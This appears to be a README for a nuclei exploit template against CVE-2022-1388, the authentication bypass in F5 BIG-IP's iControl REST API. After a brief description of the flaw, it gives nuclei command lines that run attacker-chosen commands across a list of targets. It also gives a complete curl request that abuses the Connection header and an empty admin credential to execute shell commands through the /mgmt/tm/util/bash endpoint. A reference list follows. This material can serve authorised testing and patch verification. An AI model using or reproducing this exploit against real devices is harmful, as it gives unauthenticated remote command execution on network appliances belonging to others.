CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 9.8. The iControl REST API is used for the management and configuration of BIG-IP devices. CVE-2022-1388 could be exploited by an unauthenticated attacker with network access to the management port or self IP addresses of devices that use BIG-IP. Exploitation would allow the attacker to execute arbitrary system commands, create and delete files and disable services.
This nuclei-template accepts shell parameter for exploitation. We wanted to test tokens obtained from another workflow or a manual search, so we used nuclei's CLI variable feature to dynamically feed a single token value or list of tokens into these templates at run time
-V, -var value custom vars in var=value format
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a
curl -su admin \
-H "Host: localhost:8100" \
-H "Content-Type: application/json" \
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \
-H "Authorization: Basic YWRtaW46" \
http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'
- https://blog.projectdiscovery.io/nuclei-v2-5-release/
- https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
- https://github.com/alt3kx/CVE-2022-1388_PoC
- https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md
- https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py
- https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.y
- https://github.com/tenable/audit_files/tree/master/cve-2022-1388
- https://support.f5.com/csp/article/K23605346
- https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html
- https://twitter.com/1ZRR4H/status/1522165718975922178
- https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ipaml